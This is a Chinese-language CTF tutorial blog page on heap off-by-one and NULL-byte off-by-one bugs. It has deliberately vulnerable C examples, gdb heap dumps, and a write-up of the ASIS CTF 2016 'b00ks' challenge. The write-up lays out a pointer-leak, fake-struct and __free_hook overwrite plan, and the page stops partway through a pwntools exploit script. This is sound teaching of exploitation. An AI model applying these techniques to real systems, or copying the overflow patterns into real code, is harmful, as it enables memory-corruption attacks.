<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,">





  <link rel="alternate" href="/atom.xml" title="xfgg" type="application/atom+xml">






<meta name="description" content="off by one漏洞原理1234567严格来说 off-by-one 漏洞是一种特殊的溢出漏洞，off-by-one 指程序向缓冲区中写入时，写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。off-by-one 是指单字节缓冲区溢出，这种漏洞的产生往往与边界验证不严和字符串操作有关，当然也不排除写入的size 正好就只多了一个字节的情况。其中边界验证不严通常包括使用循环语句">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="off by one">
<meta property="og:url" content="http://yoursite.com/2019/10/09/off by one/index.html">
<meta property="og:site_name" content="xfgg">
<meta property="og:description" content="off by one漏洞原理1234567严格来说 off-by-one 漏洞是一种特殊的溢出漏洞，off-by-one 指程序向缓冲区中写入时，写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。off-by-one 是指单字节缓冲区溢出，这种漏洞的产生往往与边界验证不严和字符串操作有关，当然也不排除写入的size 正好就只多了一个字节的情况。其中边界验证不严通常包括使用循环语句">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-10-09T12:07:55.619Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="off by one">
<meta name="twitter:description" content="off by one漏洞原理1234567严格来说 off-by-one 漏洞是一种特殊的溢出漏洞，off-by-one 指程序向缓冲区中写入时，写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。off-by-one 是指单字节缓冲区溢出，这种漏洞的产生往往与边界验证不严和字符串操作有关，当然也不排除写入的size 正好就只多了一个字节的情况。其中边界验证不严通常包括使用循环语句">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/09/off by one/">





  <title>off by one | xfgg</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">xfgg</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/09/off by one/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xfgg">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xfgg">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">off by one</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-10-09T19:29:56+08:00">
                2019-10-09
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf-wiki/" itemprop="url" rel="index">
                    <span itemprop="name">ctf-wiki</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="off-by-one漏洞原理"><a href="#off-by-one漏洞原理" class="headerlink" title="off by one漏洞原理"></a>off by one漏洞原理</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">严格来说 off-by-one 漏洞是一种特殊的溢出漏洞，off-by-one 指程序向缓冲区中写入时，写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。</span><br><span class="line"></span><br><span class="line">off-by-one 是指单字节缓冲区溢出，这种漏洞的产生往往与边界验证不严和字符串操作有关，当然也不排除写入的size 正好就只多了一个字节的情况。其中边界验证不严通常包括</span><br><span class="line"></span><br><span class="line">使用循环语句向堆块中写入数据时，循环的次数设置错误（这在C 语言初学者中很常见）导致多写入了一个字节。</span><br><span class="line">字符串操作不合适</span><br><span class="line">一般来说，单字节溢出被认为是难以利用的，但是因为Linux 的堆管理机制ptmalloc 验证的松散性，基于Linux 堆的off-by-one 漏洞利用起来并不复杂，并且威力强大。此外，需要说明的一点是off-by-one 是可以基于各种缓冲区的，比如栈、bss 段等等，但是堆上（heap based） 的off-by-one 是CTF 中比较常见的。我们这里仅讨论堆上的off-by-one 情况。</span><br></pre></td></tr></table></figure>

<h3 id="off-by-one利用思路"><a href="#off-by-one利用思路" class="headerlink" title="off by one利用思路"></a>off by one利用思路</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>溢出字节为可控制任意字节：通过修改大小造成块结构之间出现重叠从而泄露其他块数据，或是覆盖其他块数据。也可使用<span class="literal">NULL</span>字节溢出的方法</span><br><span class="line"><span class="number">2.</span>溢出字节为<span class="literal">NULL</span>字节：在size为<span class="number">0x100</span>的时候，溢出<span class="literal">NULL</span>字节可以使得prev_in_use位被清，这样前块会被认为是<span class="built_in">free</span>块。（<span class="number">1</span>）这时可以选择使用unlink方法（见unlink部分）进行处理。（<span class="number">2</span>）另外，这时prev_size域就会启用，就可以伪造prev_size，从而造成块之间发生重叠。此方法的关键在于unlink的时候没有检查按照prev_size找到的块的后一块（理论上是当前正在unlink的块）与当前正在unlink的块大小是否相等。</span><br><span class="line"></span><br><span class="line">C语言代码示例：</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">my_gets</span><span class="params">(<span class="keyword">char</span> *ptr,<span class="keyword">int</span> size)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;=size;i++)</span><br><span class="line">    &#123;</span><br><span class="line">        ptr[i]=getchar();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> i;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">void</span> *chunk1,*chunk2;</span><br><span class="line">    chunk1=<span class="built_in">malloc</span>(<span class="number">16</span>);</span><br><span class="line">    chunk2=<span class="built_in">malloc</span>(<span class="number">16</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Get intput"</span>);</span><br><span class="line">    my_gets(chunk1,<span class="number">16</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line">我们自己编写的my_gets 函数导致了一个off-by-one 漏洞，原因是<span class="keyword">for</span> 循环的边界没有控制好导致写入多执行了一次，这也被称为栅栏错误</span><br><span class="line">wikipedia: 栅栏错误（有时也称为电线杆错误或者灯柱错误）是差一错误的一种。如以下问题：</span><br><span class="line">建造一条直栅栏（即不围圈），长<span class="number">30</span> 米、每条栅栏柱间相隔<span class="number">3</span> 米，需要多少条栅栏柱？</span><br><span class="line">最容易想到的答案<span class="number">10</span> 是错的。这个栅栏有<span class="number">10</span> 个间隔，<span class="number">11</span> 条栅栏柱。</span><br><span class="line"></span><br><span class="line">没输入前：</span><br><span class="line"><span class="number">0x602000</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000021</span> &lt;=== chunk1</span><br><span class="line"><span class="number">0x602010</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x602020</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000021</span> &lt;=== chunk2</span><br><span class="line"><span class="number">0x602030</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000000</span></span><br><span class="line">输入后：</span><br><span class="line"><span class="number">0x602000</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000021</span> &lt;=== chunk1</span><br><span class="line"><span class="number">0x602010</span>: <span class="number">0x4141414141414141</span> <span class="number">0x4141414141414141</span></span><br><span class="line"><span class="number">0x602020</span>: <span class="number">0x0000000000000041</span> <span class="number">0x0000000000000021</span> &lt;=== chunk2</span><br><span class="line"><span class="number">0x602030</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000000</span></span><br><span class="line">    </span><br><span class="line">示例<span class="number">2</span>：</span><br><span class="line">字符串的溢出操作</span><br><span class="line"><span class="keyword">int</span> main(<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">40</span>]=<span class="string">""</span>;</span><br><span class="line">    <span class="keyword">void</span> *chunk1;</span><br><span class="line">    chunk1=<span class="built_in">malloc</span>(<span class="number">24</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Get Input"</span>);</span><br><span class="line">    gets(buffer);</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">strlen</span>(buffer)==<span class="number">24</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">strcpy</span>(chunk1,buffer);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line">程序乍看上去没有任何问题（不考虑栈溢出），可能很多人在实际的代码中也是这样写的。但是strlen和strcpy的行为不一致却导致了off-by-one的发生。strlen是我们很熟悉的计算ascii字符串长度的函数，这个函数在计算字符串长度时是不把结束符'\x00'计算在内的，但是strcpy在复制字符串时会拷贝结束符'\x00'。这就导致了我们向chunk1中写入了25个字节，我们使用gdb进行调试可以看到这一点。</span><br><span class="line"></span><br><span class="line">输入前：</span><br><span class="line"><span class="number">0x602000</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000021</span> &lt;=== chunk1</span><br><span class="line"><span class="number">0x602010</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x602020</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000411</span> &lt;=== next chunk</span><br><span class="line">输入后：</span><br><span class="line"><span class="number">0x602000</span>: <span class="number">0x0000000000000000</span> <span class="number">0x0000000000000021</span></span><br><span class="line"><span class="number">0x602010</span>: <span class="number">0x4141414141414141</span> <span class="number">0x4141414141414141</span></span><br><span class="line"><span class="number">0x602020</span>: <span class="number">0x4141414141414141</span> <span class="number">0x0000000000000400</span></span><br><span class="line">    </span><br><span class="line">    可以看到next chunk的size域低字节被结束符'\x00'覆盖，这种又属于off-by-one的一个分支称为NULL byte off-by-one，我们在后面会看到off-by-one与NULL byte off-by-one在利用上的区别。还是有一点就是为什么是低字节被覆盖呢，因为我们通常使用的CPU的字节序都是小端法的，比如一个DWORD值在使用小端法的内存中是这样储存的</span><br><span class="line">    DWORD <span class="number">0x41424344</span></span><br><span class="line">内存<span class="number">0x44</span>,<span class="number">0x43</span>,<span class="number">0x42</span>,<span class="number">0x4</span></span><br></pre></td></tr></table></figure>

<h3 id="实例1-asis-ctf-2016-b00ks"><a href="#实例1-asis-ctf-2016-b00ks" class="headerlink" title="实例1 asis ctf 2016 b00ks"></a>实例1 asis ctf 2016 b00ks</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br></pre></td><td class="code"><pre><span class="line">题目介绍</span><br><span class="line">选单式程序</span><br><span class="line"><span class="number">1.</span> Create a book</span><br><span class="line"><span class="number">2.</span> Delete a book</span><br><span class="line"><span class="number">3.</span> Edit a book</span><br><span class="line"><span class="number">4.</span> Print book detail</span><br><span class="line"><span class="number">5.</span> Change current author name</span><br><span class="line"><span class="number">6.</span> Exit</span><br><span class="line"></span><br><span class="line">程序提供了创建、删除、编辑、打印图书的功能。题目是<span class="number">64</span> 位程序，保护如下所示。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Canary : No</span><br><span class="line">NX : Yes</span><br><span class="line">PIE : Yes</span><br><span class="line">Fortify : No</span><br><span class="line">RelRO : Full</span><br><span class="line">程序每创建一个book 会分配<span class="number">0x20</span> 字节的结构来维护它的信息</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">struct book</span><br><span class="line">&#123;</span><br><span class="line">    int id;</span><br><span class="line">    char *name;</span><br><span class="line">    char *description;</span><br><span class="line">    int size;</span><br><span class="line">&#125;</span><br><span class="line">create ¶</span><br><span class="line">book 结构中存在name 和description ， name 和description 在堆上分配。首先分配name buffer ，使用malloc ，大小自定但小于<span class="number">32</span> 。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">printf(<span class="string">"\nEnter book name size: "</span>, *(_QWORD *)&amp;size);</span><br><span class="line">__isoc99_scanf(<span class="string">"%d"</span>, &amp;size);</span><br><span class="line">printf(<span class="string">"Enter book name (Max 32 chars): "</span>, &amp;size);</span><br><span class="line">ptr = malloc(size);</span><br><span class="line">之后分配description ，同样大小自定但无限制。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">printf(<span class="string">"\nEnter book description size: "</span>, *(_QWORD *)&amp;size);</span><br><span class="line">        __isoc99_scanf(<span class="string">"%d"</span>, &amp;size);</span><br><span class="line"></span><br><span class="line">v5 = malloc(size);</span><br><span class="line">之后分配book 结构的内存</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">book = malloc(<span class="number">0x20</span>uLL);</span><br><span class="line"><span class="keyword">if</span> ( book )</span><br><span class="line">&#123;</span><br><span class="line">    *((_DWORD *)book + <span class="number">6</span>) = size;</span><br><span class="line">    *((_QWORD *)off_202010 + v2) = book;</span><br><span class="line">    *((_QWORD *)book + <span class="number">2</span>) = description;</span><br><span class="line">    *((_QWORD *)book + <span class="number">1</span>) = name;</span><br><span class="line">    *(_DWORD *)book = ++unk_202024;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">漏洞</span><br><span class="line"></span><br><span class="line">signed __int64 __fastcall my_read(_BYTE *ptr, int number)</span><br><span class="line">&#123;</span><br><span class="line">  int i; // [rsp+<span class="number">14</span>h] [rbp-Ch]</span><br><span class="line">  _BYTE *buf; // [rsp+<span class="number">18</span>h] [rbp<span class="number">-8</span>h]</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( number &lt;= <span class="number">0</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">  buf = ptr;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( (unsigned int)read(<span class="number">0</span>, buf, <span class="number">1</span>uLL) != <span class="number">1</span> )</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1L</span>L;</span><br><span class="line">    <span class="keyword">if</span> ( *buf == <span class="string">'\n'</span> )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    ++buf;</span><br><span class="line">    <span class="keyword">if</span> ( i == number )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  *buf = <span class="number">0</span>; //在最后加了个/x00字符 导致了NULL byte off by one 漏洞</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">解题步骤：</span><br><span class="line">攻击过程：</span><br><span class="line"><span class="number">1.</span>填充满author</span><br><span class="line"><span class="number">2.</span>创建堆块<span class="number">1</span>，覆盖author结尾的\x00,这样我们输出的时候就可以泄露堆块<span class="number">1</span>的地址</span><br><span class="line"><span class="number">3.</span>创建堆块<span class="number">2</span>，为后续做准备，堆块<span class="number">2</span>要申请得比较大，因为mmap申请出来的堆块地址与libc有固定的偏移</span><br><span class="line"><span class="number">4.</span>露堆块<span class="number">1</span>地址，记为first_heap</span><br><span class="line"><span class="number">5.</span>(关键点来了) 这时候的攻击思路是利用编辑author的时候多写了一个\x00字节，可以覆盖到堆块<span class="number">1</span>的地址的最后一位，如果我们提前将堆块<span class="number">1</span>的内容编辑好，按照上述的结构体布置好，name和description我们自己控制，伪造成一个书本的结构体，然后让覆盖过后的地址刚好是book1的description部分的话，我们相当于获得了一个任意地址读写的能力啊</span><br><span class="line"><span class="number">6.</span>后面就简单了，任意读取获得libc地址</span><br><span class="line"><span class="number">7.</span>任意写将__free_hook函数的地址改写成one_gadget地址</span><br><span class="line">tips:__free_hook若没有则不调用，若有将先于free函数调用</span><br><span class="line">    </span><br><span class="line">测试数据：</span><br><span class="line">Enter author name: AAAAAAAABC</span><br><span class="line"></span><br><span class="line"><span class="number">1.</span> Create a book</span><br><span class="line"><span class="number">2.</span> Delete a book</span><br><span class="line"><span class="number">3.</span> Edit a book</span><br><span class="line"><span class="number">4.</span> Print book detail</span><br><span class="line"><span class="number">5.</span> Change current author name</span><br><span class="line"><span class="number">6.</span> Exit</span><br><span class="line">&gt; <span class="number">1</span> </span><br><span class="line"></span><br><span class="line">Enter book name size: <span class="number">12</span></span><br><span class="line">Enter book name (Max <span class="number">32</span> chars): liu123</span><br><span class="line"></span><br><span class="line">Enter book description size: <span class="number">20</span></span><br><span class="line">Enter book description: i am liu111111</span><br><span class="line"></span><br><span class="line">ctrl+c断下来</span><br><span class="line">gdb-peda$ find AAAABC</span><br><span class="line">Searching <span class="keyword">for</span> <span class="string">'AAAABC'</span> <span class="keyword">in</span>: <span class="literal">None</span> ranges</span><br><span class="line">Found <span class="number">1</span> results, display max <span class="number">1</span> items:</span><br><span class="line">b00ks : 0x555555756044 --&gt; 0x434241414141 ('AAAABC')</span><br><span class="line">gdb-peda$ x /<span class="number">10</span>xg <span class="number">0x555555756040</span></span><br><span class="line"><span class="number">0x555555756040</span>: <span class="number">0x4141414141414141</span>  <span class="number">0x0000000000004342</span></span><br><span class="line"><span class="number">0x555555756050</span>: <span class="number">0x0000000000000000</span>  <span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x555555756060</span>: <span class="number">0x00005555557576b0</span>  <span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x555555756070</span>: <span class="number">0x0000000000000000</span>  <span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x555555756080</span>: <span class="number">0x0000000000000000</span>  <span class="number">0x0000000000000000</span></span><br><span class="line"></span><br><span class="line">为了实现泄漏，首先在author name 中需要输入<span class="number">32</span> 个字节来使得结束符被覆盖掉。之后我们创建book1 ，这个book1 的指针会覆盖author name 中最后的NULL 字节，使得该指针与author name 直接连接，这样输出author name 则可以获取到一个堆指针</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">'author name:'</span>)</span><br><span class="line">io.sendline(<span class="string">'a'</span>*<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">io.sendline(<span class="string">'1'</span>)</span><br><span class="line">io.recvuntil(<span class="string">'book name size:'</span>)</span><br><span class="line">io.sendline(<span class="string">'32'</span>)</span><br><span class="line">io.recvuntil(<span class="string">'book name(max 32 chars):'</span>)</span><br><span class="line">io.sendline(<span class="string">'object1'</span>)</span><br><span class="line">io.recvuntil(<span class="string">'Enter book description:'</span>)</span><br><span class="line">io.sendline(<span class="string">'object1'</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">'&gt;'</span>) <span class="comment"># print book1</span></span><br><span class="line">io.sendline(<span 